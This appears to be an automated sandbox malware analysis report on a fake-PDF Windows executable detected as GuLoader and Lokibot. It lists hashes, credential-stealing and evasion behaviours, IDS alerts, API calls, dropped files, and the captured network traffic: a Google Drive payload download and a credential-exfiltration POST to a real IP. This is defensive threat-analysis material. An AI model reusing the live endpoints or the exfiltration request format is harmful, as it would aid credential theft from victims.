Edit tour

Windows Analysis Report
REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Overview

General Information

Sample Name:	REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Analysis ID:	756301
MD5:	b9f70f4146b846179fa182ac868d0c15
SHA1:	97cb5de0e0cc2f53cd73552f9d5b4381ab5a5907
SHA256:	ff235029990af0449ce8f82c5546dfe37170d5e27ce1a22b0a43965a980344be
Infos:

Detection

GuLoader, Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Lokibot

Antivirus detection for URL or domain

Yara detected GuLoader

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

One or more processes crash

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe (PID: 4112 cmdline: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe MD5: B9F70F4146B846179FA182AC868D0C15)

REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe (PID: 7568 cmdline: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe MD5: B9F70F4146B846179FA182AC868D0C15)

WerFault.exe (PID: 1144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980 MD5: 40A149513D721F096DDF50C04DA2F01F)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.54385682867.00000000007CC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000005.00000000.54201456373.0000000001660000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Snort Signatures

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.11.20 - Destination IP: 157.245.36.27

Timestamp:	192.168.11.20157.245.36.2749838802021641 11/30/22-00:31:37.333969
SID:	2021641
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.11.20 - Destination IP: 157.245.36.27

Timestamp:	192.168.11.20157.245.36.2749838802024317 11/30/22-00:31:37.333969
SID:	2024317
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.11.20 - Destination IP: 157.245.36.27

Timestamp:	192.168.11.20157.245.36.2749838802024312 11/30/22-00:31:37.333969
SID:	2024312
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /~dokterpol/?page=2874 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 157.245.36.27Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A663AB80Content-Length: 178Connection: close

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p0f9eoc2qkjfmonuuk5gkqmq4/1669764675000/03238822727237126472/*/1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW?e=download&uuid=c4bc146b-22c6-4e17-89b8-c96a6eb96fab HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-8k-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.11.20:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49837 version: TLS 1.2

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Code function: 2_2_004054B0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

2_2_004054B0

Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Code function: 2_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

2_2_0040344A

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_004068DA	2_2_004068DA
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_00404CED	2_2_00404CED
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032ECB42	2_2_032ECB42
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D6122	2_2_032D6122
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D5B37	2_2_032D5B37
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D7306	2_2_032D7306
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D5944	2_2_032D5944
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032EF95D	2_2_032EF95D
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D17BD	2_2_032D17BD
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D61DB	2_2_032D61DB
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D3DD6	2_2_032D3DD6
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D6221	2_2_032D6221
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D7430	2_2_032D7430
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D7607	2_2_032D7607
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D5C06	2_2_032D5C06
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D5E16	2_2_032D5E16
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D727E	2_2_032D727E
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D587A	2_2_032D587A
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D5A43	2_2_032D5A43
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032EE6AB	2_2_032EE6AB
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D58A1	2_2_032D58A1
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D6C8B	2_2_032D6C8B
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032EC892	2_2_032EC892
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D74FA	2_2_032D74FA
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032DA6F5	2_2_032DA6F5
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D6CCB	2_2_032D6CCB
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032ECCDC	2_2_032ECCDC
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 5_2_0168101C	5_2_0168101C

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032F07A4 NtProtectVirtualMemory,	2_2_032F07A4
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032F1813 NtResumeThread,	2_2_032F1813
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 5_2_0168157A NtProtectVirtualMemory,	5_2_0168157A

Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAsOpenFile.exeL vs REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

ReversingLabs: Detection: 17%

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

File read: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Jump to behavior

Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

2_2_0040344A

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

File created: C:\Users\user\AppData\Local\Folkedansens

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

File created: C:\Users\user\AppData\Local\Temp\nsf145.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/6@2/3

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Code function: 2_2_00402104 CoCreateInstance,

2_2_00402104

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Code function: 2_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

2_2_00404771

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Mutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Bekvemmeligheder

Jump to behavior

Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr
Source:	Binary string: mshtml.pdbUGP source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb,,)GCTL source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.54201456373.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.54385682867.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_10002DE0 push eax; ret	2_2_10002E0E
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D0730 push eax; retf	2_2_032D0732
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D4DCE push eax; ret	2_2_032D4DD6
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Code function: 2_2_032D46FC push ecx; iretd	2_2_032D4705

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe

Code function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

2_2_10001B18

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	File created: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	File created: C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exe			Jump to dropped file

Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
